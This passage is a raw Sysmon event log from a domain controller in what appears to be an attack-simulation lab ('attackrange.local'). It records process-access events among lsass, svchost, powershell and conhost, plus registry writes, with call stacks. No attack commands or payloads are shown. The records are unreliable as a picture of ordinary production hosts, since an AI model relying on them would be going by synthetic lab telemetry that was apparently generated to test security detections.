CRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001107Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:07.336{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001106Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:07.336{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001105Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:07.321{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001104Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:07.321{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001103Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:07.321{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001102Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:07.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001101Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:07.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001100Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:07.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 10341000x80000000000000001099Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:06.899{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1900-000000009101}2184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001098Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:06.899{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001097Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:06.586{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000353) 10341000x80000000000000001096Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.930{10ACEC4A-8541-5FCF-2100-000000009101}24642504C:\Windows\system32\conhost.exe{10ACEC4A-8541-5FCF-1C00-000000009101}2208C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001095Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.930{10ACEC4A-8541-5FCF-1F00-000000009101}23162500C:\Windows\system32\conhost.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001094Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.930{10ACEC4A-8541-5FCF-1B00-000000009101}22002496C:\Windows\system32\conhost.exe{10ACEC4A-8541-5FCF-1900-000000009101}2184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001093Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.930{10ACEC4A-8541-5FCF-1A00-000000009101}21922508C:\Windows\system32\conhost.exe{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001092Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.899{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001091Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.899{10ACEC4A-853E-5FCF-0B00-000000009101}86496C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001090Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.836{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2464C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x80000000000000001089Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.805{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x0000054c) 10341000x80000000000000001088Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001087Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001086Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001085Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001084Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001083Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001082Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001081Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001080Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001079Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001078Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.790{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 